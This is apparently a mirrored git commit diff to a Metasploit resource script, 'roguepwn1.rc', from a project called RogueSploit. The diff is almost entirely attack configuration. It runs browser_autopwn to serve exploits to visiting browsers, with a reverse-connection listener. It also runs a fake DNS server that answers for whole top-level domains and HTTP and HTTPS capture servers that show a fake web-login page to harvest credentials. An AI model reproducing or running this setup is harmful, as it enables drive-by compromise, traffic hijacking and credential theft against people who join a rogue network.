mirror of
https://github.com/aljazceru/RogueSploit.git
synced 2025-12-17 06:14:21 +01:00
Some changes and updates
This commit is contained in:
28
roguepwn1.rc
28
roguepwn1.rc
@@ -1,12 +1,9 @@
|
||||
use auxiliary/server/browser_autopwn
|
||||
|
||||
set AUTOPWN_HOST 10.0.0.1
|
||||
set AUTOPWN_PORT 80
|
||||
set AUTOPWN_URI /
|
||||
set LHOST 10.0.0.1
|
||||
set LPORT 45000
|
||||
set SRVHOST 10.0.0.1
|
||||
set SRVPORT 80
|
||||
set URIPATH /
|
||||
set SRVPORT 8081
|
||||
set URIPATH /try
|
||||
|
||||
run -j
|
||||
|
||||
@@ -27,3 +24,22 @@ set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu, *.fr
|
||||
set TARGET ACTION BYPASS
|
||||
set SRVPORT 53
|
||||
run -j
|
||||
|
||||
use auxiliary/server/capture/http
|
||||
set AUTOPWN_HOST 10.0.0.1
|
||||
set AUTOPWN_PORT 8081
|
||||
set AUTOPWN_URI /try
|
||||
set SRVHOST 10.0.0.1
|
||||
set TEMPLATE weblogin/index.html
|
||||
set SRVPORT 80
|
||||
run -j
|
||||
|
||||
use auxiliary/server/capture/http
|
||||
set AUTOPWN_HOST 10.0.0.1
|
||||
set AUTOPWN_PORT 8081
|
||||
set AUTOPWN_URI /try
|
||||
set SRVHOST 10.0.0.1
|
||||
set TEMPLATE weblogin/index.html
|
||||
set SSL true
|
||||
set SRVPORT 443
|
||||
run -j
|
||||
|
||||
Reference in New Issue
Block a user